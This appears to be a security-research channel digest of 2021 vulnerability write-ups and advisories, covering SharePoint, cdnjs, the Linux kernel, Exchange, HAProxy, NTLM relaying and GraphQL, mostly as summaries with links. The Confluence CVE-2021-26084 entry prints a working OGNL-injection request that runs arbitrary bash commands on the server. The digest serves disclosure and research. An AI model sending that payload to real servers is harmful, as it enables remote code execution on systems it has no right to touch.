CVE-2021-28474: SHAREPOINT RCE VIA SERVER-SIDE CONTROL INTERPRETATION CONFLICT
👤 by @thezdi
The vulnerability allows authenticated users to execute arbitrary .NET code on the server in the context of the service account of the SharePoint web application. By default, authenticated SharePoint users have all necessary permissions.
📝 Contents:
• The Vulnerability
• Exploitation
• Proof of Concept
• Getting Remote Code Execution
• Conclusion
https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict
Zero Day Initiative
Zero Day Initiative — CVE-2021-28474: SharePoint Remote Code Execution via Server-Side Control Interpretation Conflict
In May of 2021, Microsoft released a patch to correct CVE-2021-28474, a remote code execution bug in supported versions of Microsoft SharePoint Server. This bug was reported to ZDI by an anonymous researcher and is also known as ZDI-21-574. This blog…
Remote code execution in cdnjs of Cloudflare
👤 by @ryotkak
A path traversal in Cloudflare's cdnjs library update server during archive extraction could be used to execute arbitrary commands, and as a result, cdnjs could be completely compromised, affecting around 12.7% of all websites on the internet once caches are expired.
📝 Contents:
• Preface
• TL;DR
• About cdnjs
• Reason for investigation
• Initial investigation
• Investigation of automatic update
• Path traversal
• Demonstration of vulnerability
• Incident
• Determinate impact
• Conclusion
• Timeline
https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
blog.ryotak.net
Remote code execution in cdnjs of Cloudflare
Preface
(A Japanese version is also available.)
Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments.
This article describes vulnerabilities reported through this program and published…
Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤 by Bharat Jogi
"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."
📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)
https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
Qualys
Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909) | Qualys
The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root…
Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq
You should turn off autofill in your password manager
👤 by @marektoth
11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best-practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.
📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion
https://marektoth.com/blog/password-managers-autofill/
NTLM relaying to AD CS - On certificates, printers and a little hippo
👤 by @_dirkjan
More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.
📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools
https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
dirkjanm.io
NTLM relaying to AD CS - On certificates, printers and a little hippo
I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic. Since there seems to be some confusion out there on the how…
SAML is insecure by design
👤 by @joonas_fi
"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."
📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading
https://joonas.fi/2021/08/saml-is-insecure-by-design/
joonas.fi
SAML is insecure by design
What is SAML? Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties.
Source: Wikipedia
SAML is often used for single sign-on (“Sign in with Google”, “Sign in with Twitter” etc.).…
MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy.
RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith.
Advisory: https://mybb.com/versions/1.8.25/
🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE!
Current: https://support.citrix.com/article/CTX267027
Mar 2021: http://web.archive.org/web/20210321090412/https://support.citrix.com/article/CTX267027
PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
👤 by Simon Zuckerbraun
With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users, for example copying all emails addressed to a target account and forwarding them to an attacker-controlled account. The vulnerability arises due to the authentication module not being loaded on the back end.
📝 Contents:
• The Trigger
• Understanding the Root Cause
• Bagging a Canary
• Conclusion
https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
Zero Day Initiative
Zero Day Initiative — ProxyToken: An Authentication Bypass in Microsoft Exchange Server
Continuing with the theme of serious vulnerabilities that have recently come to light in Microsoft Exchange Server, in this article we present a new vulnerability we call ProxyToken. It was reported to the Zero Day Initiative in March 2021 by researcher Le…
Exploiting GraphQL
👤 by @infosec_au
Overview of GraphQL attacks.
📝 Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
Remote Code Execution on Confluence Servers write-up (CVE-2021-26084)
👤 by rootxharsh and iamnoooob
Patch diffing the latest Confluence update results in an RCE PoC.
PoC:
POST /pages/doenterpagevariables.action HTTP/2
Host: localhost
Content-Length: 301
Content-Type: application/x-www-form-urlencoded

queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027'.$cmd.'\u0027]);x.start()\u0022)}%2b\u0027
📝 Contents:
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
SAP refused to disclose which CVEs were assigned to vulnerabilities reported by our researcher Mikhail Klyuchnikov, if any.
Three subsequent letters remain unanswered.
We believe the CVEs to be CVE-2021-33690 (CVSS 9.9) and CVE-2021-33691 (CVSS 6.9) in the August hotfix.
Join the discussion on Twitter: https://twitter.com/ptswarm/status/1433070547399757824
RCE on a backend IIS server via file upload with an atypical file extension.
More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling
👤 by Ori Hollander and Or Peles
The vulnerability, CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.
📝 Contents:
• Technical Background
• HTTP Request Smuggling
• HAProxy’s HTTP request processing phases (simplified)
• Attack Scenario – Bypassing http-request ACLs
• What happens inside HAProxy
• Getting the HTTP response for the smuggled request
• Attack demonstration – ACL bypass
• Vulnerability Details
• Automating the Discovery
• Fixes and Workarounds
https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/
JFrog
Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling
JFrog Security research teams are constantly looking for new and previously unknown vulnerabilities in popular open-source projects to help improve their security posture. As part of this effort, we recently discovered a potentially critical vulnerability…
The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
👤 by @jensneuse_de
The complete GraphQL security guide. 'Nuff said.
📝 Contents:
• The 13 most common GraphQL Vulnerabilities
• Solving the 13 most common GraphQL Vulnerabilities for private APIs
• Solving the 13 most common GraphQL Vulnerabilities for public APIs
https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready
WunderGraph
The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
A description of the 13 most common GraphQL vulnerabilities and how to mitigate them.